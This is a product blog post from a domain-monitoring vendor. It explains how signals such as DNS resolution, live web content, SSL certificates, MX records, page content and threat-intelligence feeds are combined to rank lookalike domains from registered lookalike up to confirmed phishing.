← Back to Blog
Product April 1, 2026 5 min read

Not Every Lookalike Domain Is a Threat. Here Is How to Tell the Difference.

A registered lookalike domain is not the same as an active phishing site. Understanding the signals that separate real threats from noise is critical to an effective response.

Domain monitoring tools generate a lot of alerts. A scan against a single brand name can surface hundreds of registered lookalike domains, from obvious typos to TLD variants to homoglyph-based impersonations.

The immediate question for any security team is: which of these actually require attention?

A registered domain that does not resolve, has no website, no email capability, and no SSL certificate is probably not an active threat. A registered domain with a cloned login page, a valid certificate from Let's Encrypt, and MX records configured for email delivery is a different situation entirely.

This is what risk scoring is designed to solve.

The Signals We Evaluate

DNS Resolution

The most basic signal. Does the domain resolve to an IP address? A domain that does not resolve is registered but inactive. It may have been registered speculatively, defensively, or as part of a future campaign. It deserves monitoring, but not an emergency response.

Live HTTP Content

Is a web server responding to requests? This distinguishes a parked domain from one where someone has deployed content. The presence of live HTTP content does not confirm malicious intent on its own, but it significantly increases the probability.

SSL Certificate

A valid SSL certificate means the site displays a padlock icon in the browser. For a phishing site, this is the difference between a page that triggers browser warnings and one that looks completely legitimate to the average user. We also record who issued the certificate. Certificates from Let's Encrypt are issued automatically with no identity verification, making them the CA of choice for phishing operations.

MX Records

MX records indicate that the domain can receive email. This is a significant escalation signal. A lookalike domain with MX records can be used for email-based phishing, invoice fraud, and business email compromise (BEC). It can also be configured to intercept replies that were intended for your real domain.

Content Analysis

Beyond checking whether a site is live, PhishFence fetches the actual page content and examines it for specific phishing indicators: login forms with password fields, references to your brand name embedded in the HTML, form actions that submit data to external servers, and patterns that match known phishing kits.

This is the difference between "the domain has a website" and "the domain has a website that is actively trying to steal credentials from your customers."

Threat Intelligence

We check every detected domain against public threat intelligence feeds, including URLhaus, Google Safe Browsing, and PhishTank. If a domain has already been reported as malicious by another organization or security researcher, that provides strong independent confirmation.

Confidence Levels

Combining these signals produces a confidence assessment for each alert:

Confirmed phishing means the domain matches your brand, serves a credential harvesting page, and has been independently flagged by threat intelligence sources. This requires immediate takedown action.

Likely phishing means the domain has all the infrastructure for a phishing campaign (live site, SSL, MX, login form) but has not yet been flagged by external feeds. It may be newly deployed or not yet reported. The response should be the same as confirmed phishing: report it immediately.

Suspected impersonation means the domain is live and references your brand, but the content does not contain obvious credential harvesting elements. It may be a competitor, a parody, a fan site, or early-stage phishing infrastructure. Investigation is warranted.

Registered lookalike means the domain matches a permutation pattern and is registered, but shows minimal or no active infrastructure. Monitor it. If the attacker activates it later, the signal changes will trigger a re-evaluation.

Why This Approach Works

Tools that rely on a single signal (domain similarity, DNS resolution, or string matching) generate too much noise. Security teams drown in alerts, most of which turn out to be harmless registrations or unrelated websites that happen to use a similar name.

Multi-signal scoring reduces that noise by combining independent indicators. A domain has to demonstrate multiple characteristics of a phishing operation before it reaches the top of the priority list. This means fewer false positives, faster response to real threats, and less time wasted investigating domains that pose no risk.

Protect your brand from lookalike domains

PhishFence monitors your domain for typosquats, homoglyphs, and phishing sites — and alerts you before your customers are targeted.

Start Free Monitoring